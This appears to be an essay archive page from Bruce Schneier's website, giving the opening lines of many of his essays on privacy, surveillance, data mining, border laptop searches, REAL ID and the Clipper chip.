In January Facebook Chief Executive, Mark Zuckerberg, declared the age of privacy to be over. A month earlier, Google Chief Eric Schmidt expressed a similar sentiment. Add Scott McNealy's and Larry Ellison's comments from a few years earlier, and you've got a whole lot of tech CEOs proclaiming the death of privacy--especially when it comes to young people.
It's just not true.
On January 19, a team of at least 15 people assassinated Hamas leader Mahmoud al-Mabhouh. The Dubai police released video footage of 11 of them. While it was obviously a very professional operation, the 27 minutes of video is fascinating in its banality. Team members walk through the airport, check in and out of hotels, get in and out of taxis.
Google made headlines when it went public with the fact that Chinese hackers had penetrated some of its services, such as Gmail, in a politically motivated attempt at intelligence gathering. The news here isn't that Chinese hackers engage in these activities or that their attempts are technically sophisticated -- we knew that already -- it's that the U.S. government inadvertently aided the hackers.
In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts.
Our use of social networking, as well as iPhones and Kindles, relinquishes control of how we delete files -- we need that back
File deletion is all about control. This used to not be an issue. Your data was on your computer, and you decided when and how to delete a file. You could use the delete function if you didn't care about whether the file could be recovered or not, and a file erase program -- I use BCWipe for Windows -- if you wanted to ensure no one could ever recover the file.
More and more people are using computers to chat with each other, but there's no such thing as a passing conversation on the Web
Facebook recently made changes to its service agreement in order to make members' data more accessible to other computer users. Amuse, Inc. announced last week that hackers stole credit-card information from about 150,000 clients. Hackers broke into the social network Twitter's system and stole documents.
Your online data is not private.
China is the world's most successful Internet censor. While the Great Firewall of China isn't perfect, it effectively limits information flowing in and out of the country. But now the Chinese government is taking things one step further.
Under a requirement taking effect soon, every computer sold in China will have to contain the Green Dam Youth Escort software package.
Reassuring people about privacy makes them more, not less, concerned. It's called "privacy salience", and Leslie John, Alessandro Acquisti, and George Loewenstein -- all at Carnegie Mellon University -- demonstrated this in a series of clever experiments. In one, subjects completed an online survey consisting of a series of questions about their academic behaviour -- "Have you ever cheated on an exam?" for example. Half of the subjects were first required to sign a consent warning -- designed to make privacy concerns more salient -- while the other half did not.
Last year, I wrote about the increasing propensity for governments, including the U.S. and Great Britain, to search the contents of people's laptops at customs. What we know is still based on anecdote, as no country has clarified the rules about what their customs officers are and are not allowed to do, and what rights people have.
Companies and individuals have dealt with this problem in several ways, from keeping sensitive data off laptops traveling internationally, to storing the data -- encrypted, of course -- on websites and then downloading it at the destination.
Do you know what your data did last night? Almost none of the more than 27 million people who took the RealAge quiz realized that their personal health data was being used by drug companies to develop targeted e-mail marketing campaigns.
There's a basic consumer protection principle at work here, and it's the concept of "unfair and deceptive" trade practices. Basically, a company shouldn't be able to say one thing and do another: sell used goods as new, lie on ingredients lists, advertise prices that aren't generally available, claim features that don't exist, and so on.
In the United States, the concept of "expectation of privacy" matters because it's the constitutional test, based on the Fourth Amendment, that governs when and how the government can invade your privacy.
Based on the 1967 Katz v. United States Supreme Court decision, this test actually has two parts. First, the government's action can't contravene an individual's subjective expectation of privacy; and second, that expectation of privacy must be one that society in general recognizes as reasonable.
Welcome to the future, where everything about you is saved. A future where your actions are recorded, your movements are tracked, and your conversations are no longer ephemeral. A future brought to you not by some 1984-like dystopia, but by the natural tendencies of computers to produce data.
Data is the pollution of the information age.
Earlier this month, the Supreme Court ruled that evidence gathered as a result of errors in a police database is admissible in court. Their narrow decision is wrong, and will only ensure that police databases remain error-filled in the future.
The specifics of the case are simple. A computer database said there was a felony arrest warrant pending for Bennie Herring when there actually wasn't.
The Internet isn't really for us. We're here at the beginning, stumbling around, just figuring out what it's good for and how to use it. The Internet is for those born into it, those who have woven it into their lives from the beginning. The Internet is the greatest generation gap since rock and roll, and only our children can hope to understand it.
As the first digital president, Barack Obama is learning the hard way how difficult it can be to maintain privacy in the information age. Earlier this year, his passport file was snooped by contract workers in the State Department. In October, someone at Immigration and Customs Enforcement leaked information about his aunt's immigration status. And in November, Verizon employees peeked at his cellphone records.
When he becomes president, Barack Obama will have to give up his BlackBerry. Aides are concerned that his unofficial conversations would become part of the presidential record, subject to subpoena and eventually made public as part of the country's historical record.
This reality of the information age might be particularly stark for the president, but it's no less true for all of us. Conversation used to be ephemeral.
Pervasive security cameras don't substantially reduce crime. There are exceptions, of course, and that's what gets the press. Most famously, CCTV cameras helped catch James Bulger's murderers in 1993. And earlier this year, they helped convict Steve Wright of murdering five women in the Ipswich area.
Last month a US court ruled that border agents can search your laptop, or any other electronic device, when you're entering the country. They can take your computer and download its entire contents, or keep it for several days. Customs and Border Patrol has not published any rules regarding this practice, and I and others have written a letter to Congress urging it to investigate and regulate this practice.
But the US is not alone.
Dutch version by Jeroen van der Ham
In the information age, we all have a data shadow.
We leave data everywhere we go. It's not just our bank accounts and stock portfolios, or our itemized bills, listing every credit card purchase and telephone call we make. It's automatic road-toll collection systems, supermarket affinity cards, ATMs and so on.
When I write and speak about privacy, I am regularly confronted with the mutual disclosure argument. Explained in books like David Brin's The Transparent Society, the argument goes something like this: In a world of ubiquitous surveillance, you'll know all about me, but I will also know all about you. The government will be watching us, but we'll also be watching the government. This is different than before, but it's not automatically worse.
If there's a debate that sums up post-9/11 politics, it's security versus privacy. Which is more important? How much privacy are you willing to give up for security? Can we even afford privacy in this age of insecurity?
Last year, Netflix published 10 million movie rankings by 500,000 customers, as part of a challenge for people to come up with better recommendation systems than the one the company was using. The data was anonymized by removing personal details and replacing names with random numbers, to protect the privacy of the recommenders.
Arvind Narayanan and Vitaly Shmatikov, researchers at the University of Texas at Austin, de-anonymized some of the Netflix data by comparing rankings and timestamps with public information in the Internet Movie Database, or IMDb.
Their research (.pdf) illustrates some inherent security problems with anonymous data, but first it's important to explain what they did and did not do.
Computer security is hard. Software, computer and network security are all ongoing battles between attacker and defender. And in many cases the attacker has an inherent advantage: He only has to find one network flaw, while the defender has to find and fix every flaw.
Cryptography is an exception.
As the name implies, Alcoholics Anonymous meetings are anonymous. You don't have to sign anything, show ID or even reveal your real name. But the meetings are not private. Anyone is free to attend.
We learned the news in March: Contrary to decades of denials, the U.S. Census Bureau used individual records to round up Japanese-Americans during World War II.
The Census Bureau normally is prohibited by law from revealing data that could be linked to specific individuals; the law exists to encourage people to answer census questions accurately and without fear. And while the Second War Powers Act of 1942 temporarily suspended that protection in order to locate Japanese-Americans, the Census Bureau had maintained that it only provided general information about neighborhoods.
Testimony of Bruce Schneier
Security technologist, author, founder and CTO of BT Counterpane
"Will REAL ID Actually Make Us Safer?
An Examination of Privacy and Civil Liberties Concerns"
Senate Judiciary Committee
Room 226, Dirksen Senate Office Building
Tuesday, May 8, 2007
I appreciate the opportunity to appear before the Committee today to discuss privacy issues. My name is Bruce Schneier. I am a security technologist, author, and CTO of BT Counterpane.
This essay appeared as part of a point-counterpoint with Marcus Ranum. Marcus's side, to which this is a response, can be found on his website.
Big Brother isn't what he used to be. George Orwell extrapolated his totalitarian state from the 1940s. Today's information society looks nothing like Orwell's world, and watching and intimidating a population today isn't anything like what Winston Smith experienced.
On Wednesday, Mayor Bloomberg announced that New York will be the first city with 911 call centers able to receive images and videos from cell phones and computers. If you witness a crime, you can not only call in - you can send in a picture or video as well.
This is a great idea that can make us all safer. Often the biggest problem a 911 operator has is getting enough good information from the caller.
San Francisco police have a new law enforcement tool: a car-mounted license-plate scanner. Similar to a radar gun, it reads the license plates of moving or parked cars -- 250 or more per hour -- and links with remote police databases, immediately providing information about the car and its owner. Right now, the police check for unpaid parking tickets. A car that comes up positive on the database is booted.
This article was published under the title "They're Watching."
If you've traveled abroad recently, you've been investigated. You've been assigned a score indicating what kind of terrorist threat you pose. That score is used by the government to determine the treatment you receive when you return to the U.S. and for other purposes as well.
This essay appeared as the second half of a point-counterpoint with Marcus Ranum. Marcus's side can be found on his website.
Personal information protection is an economic problem, not a security problem. And the problem can be easily explained: The organizations we trust to protect our personal information do not suffer when information gets exposed. On the other hand, individuals who suffer when personal information is exposed don't have the capability to protect that information.
The political firestorm over former U.S. Rep. Mark Foley's salacious instant messages hides another issue, one about privacy. We are rapidly turning into a society where our intimate conversations can be saved and made public later. This represents an enormous loss of freedom and liberty, and the only way to solve the problem is through legislation.
Earlier this month, the popular social networking site Facebook learned a hard lesson in privacy. It introduced a new feature called "News Feeds" that shows an aggregation of everything members do on the site, such as added and deleted friends, a change in relationship status, a new favorite song, a new interest. Instead of a member's friends having to go to his page to view any changes, these changes are all presented to them automatically.
The outrage was enormous.
Better to Put People, Not Computers, in Charge of Investigating Potential Plots
Collecting information about every American's phone calls is an example of data mining. The basic idea is to collect as much information as possible on everyone, sift through it with massive computers, and uncover terrorist plots. It's a compelling idea, and convinces many. But it's wrong.
French translation [#1]
French translation [#2]
The most common retort against privacy advocates -- by those in favor of ID checks, cameras, databases, data mining and other wholesale surveillance measures -- is this line: "If you aren't doing anything wrong, what do you have to hide?"
Some clever answers: "If I'm not doing anything wrong, then you have no cause to watch me." "Because the government gets to define what's wrong, and they keep changing the definition." "Because you might do something wrong with my information." My problem with quips like these -- as right as they are -- is that they accept the premise that privacy is about hiding a wrong. It's not. Privacy is an inherent human right, and a requirement for maintaining the human condition with dignity and respect.
Two proverbs say it best: Quis custodiet custodes ipsos? ("Who watches the watchers?") and "Absolute power corrupts absolutely."
Cardinal Richelieu understood the value of surveillance when he famously said, "If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged." Watch someone long enough, and you'll find something to arrest -- or just blackmail -- with.
Over the past 20 years, there's been a sea change in the battle for personal privacy.
The pervasiveness of computers has resulted in the almost constant surveillance of everyone, with profound implications for our society and our freedoms. Corporations and the police are both using this new trove of surveillance data. We as a society need to understand the technological trends and discuss their implications.
In a recent essay, Kevin Kelly warns of the dangers of anonymity. It's OK in small doses, he maintains, but too much of it is a problem: "(I)n every system that I have seen where anonymity becomes common, the system fails. The recent taint in the honor of Wikipedia stems from the extreme ease which anonymous declarations can be put into a very visible public record. Communities infected with anonymity will either collapse, or shift the anonymous to pseudo-anonymous, as in eBay, where you have a traceable identity behind an invented nickname."
Kelly has a point, but it comes out all wrong.
Spying tools are now routinely used against ordinary, law-abiding Americans who have no connection to terrorism.
Christmas 2003, Las Vegas. Intelligence hinted at a terrorist attack on New Year's Eve. In the absence of any real evidence, the FBI tried to compile a real-time database of everyone who was visiting the city. It collected customer data from airlines, hotels, casinos, rental car companies, even storage locker rental companies. All this information went into a massive database -- probably close to a million people overall -- that the FBI's computers analyzed, looking for links to known terrorists.
At John Roberts' confirmation hearings last week, there weren't enough discussions about science fiction. Technologies that are science fiction today will become constitutional questions before Roberts retires from the bench. The same goes for technologies that cannot even be conceived of now. And many of these questions involve privacy.
The epidemic of personal data thefts and losses - most recently 40 million individuals by Visa and MasterCard - should concern us for two reasons: personal privacy and identity theft.
Real reform is required to solve these problems. We need to reduce the amount of personal information collected, limit how it can be used and resold, and require companies that mishandle our data to be liable for that mishandling. And, most importantly, we need to make financial institutions liable for fraudulent transactions.
Reports are coming in torrents. Criminals are known to have downloaded personal credit information of over 145,000 Americans from ChoicePoint's network. Hackers took over one of Lexis Nexis' databases, gaining access to personal files of 32,000 people. Bank of America Corp. lost computer data tapes that contained personal information on 1.2 million federal employees, including members of the U.S.
In the post-9/11 world, there's much focus on connecting the dots. Many believe data mining is the crystal ball that will enable us to uncover future terrorist plots. But even in the most wildly optimistic projections, data mining isn't tenable for that purpose. We're not trading privacy for security; we're giving up privacy and getting no security in return.
Opinion: The courts need to recognize that in the information age, virtual privacy and physical privacy don't have the same boundaries.
For at least seven months last year, a hacker had access to T-Mobile's customer network. He is known to have accessed information belonging to 400 customers—names, Social Security numbers, voice mail messages, SMS messages, photos—and probably had the ability to access data belonging to any of T-Mobile's 16.3 million U.S. customers.
The World Series is no stranger to security. Fans try to sneak into the ballpark without tickets or with counterfeit tickets. Often foods and alcohol are prohibited from being brought into the ballpark, to enforce the monopoly of the high-priced concessions.
Violence is always a risk: both small fights and larger-scale riots that result from fans from both teams being in such close proximity -- like the one that almost happened during the sixth game of the American League Championship Series.
Since the terrorist attacks of 2001, the Bush administration -- specifically, the Department of Homeland Security -- has wanted the world to agree on a standard for machine-readable passports. Countries whose citizens currently do not have visa requirements to enter the United States will have to issue passports that conform to the standard or risk losing their nonvisa status.
These future passports, currently being tested, will include an embedded computer chip. This chip will allow the passport to contain much more information than a simple machine-readable character font, and will allow passport officials to quickly and easily read that information.
The Baltimore housing department has a new tool to find homeowners who have been building rooftop decks without a permit: aerial mapping. Baltimore bought aerial photographs of the entire city and used software to correlate the images with databases of address information and permit records. Inspectors have just begun knocking on doors of residents who built decks without permission.
On the face of it, this is nothing new.
New Haven police have a new law enforcement tool: a license-plate scanner. Similar to a radar gun, it reads the license plates of moving or parked cars and links with remote police databases, immediately providing information about the car and owner. Right now the police check if there are any taxes owed on the car, if the car or license plate is stolen, and if the car is unregistered or uninsured. A car that comes up positive is towed.
In the wake of the U.S. Department of Homeland Security's awarding of its largest contract, for a system to fingerprint and to keep tabs on foreign visitors in the United States, it makes sense to evaluate our country's response to terrorism. Are we getting good value for all the money that we're spending?
US-VISIT is a government program to help identify the 23 million foreigners who visit the United States every year.
As technological monitoring grows more prevalent, court supervision is crucial
Years ago, surveillance meant trench-coated detectives following people down streets.
Today's detectives are more likely to be sitting in front of a computer, and the surveillance is electronic. It's cheaper, easier and safer. But it's also much more prone to abuse.
At a gas station in British Columbia, two employees installed a camera in the ceiling in front of an ATM machine. They recorded thousands of people as they typed in their PIN numbers. Combined with a false front on the ATM that recorded account numbers from the cards, the pair were able to steal millions before they were caught.
In at least 14 Kinko's copy shops in New York City, Juju Jiang installed keystroke loggers on the rentable computers.
In September 2002, JetBlue Airways secretly turned over data about 1.5 million of its passengers to a company called Torch Concepts, under contract with the Department of Defense.
Torch Concepts merged this data with Social Security numbers, home addresses, income levels and automobile records that it purchased from another company, Acxiom Corp. All this was to test an automatic profiling system to automatically give each person a terrorist threat ranking.
The events of 11 September offer a rare chance to rethink public security.
Appalled by the events of 11 September, many Americans have declared so loudly that they are willing to give up civil liberties in the name of security that this trade-off seems to be a fait accompli. Article after article in the popular media debates the 'balance' of privacy and security -- are various types of increase in security worth the consequent losses to privacy and civil liberty? Rarely do I see discussion about whether this linkage is valid.
Security and privacy are not two sides of an equation.
Good news! The federal government respects and is working to protect your privacy... just as long as you don't want privacy from the government itself.
In April 1994, the Clinton administration, cleaning up old business from the Bush administration, introduced a new cryptography initiative that ensures the government's ability to conduct electronic surveillance.
In April, the Clinton administration, cleaning up business left over from the Bush administration, introduced a cryptography initiative that gives government the ability to conduct electronic surveillance. The first fruit of this initiative is Clipper, a National Security Agency (NSA)-designed, tamper-resistant VLSI chip. The stated purpose of this chip is to secure telecommunications.
Clipper uses a classified encryption algorithm.
Photo of Bruce Schneier by Per Ervland.
Schneier on Security is a personal website. Opinions expressed are not necessarily those of IBM Resilient.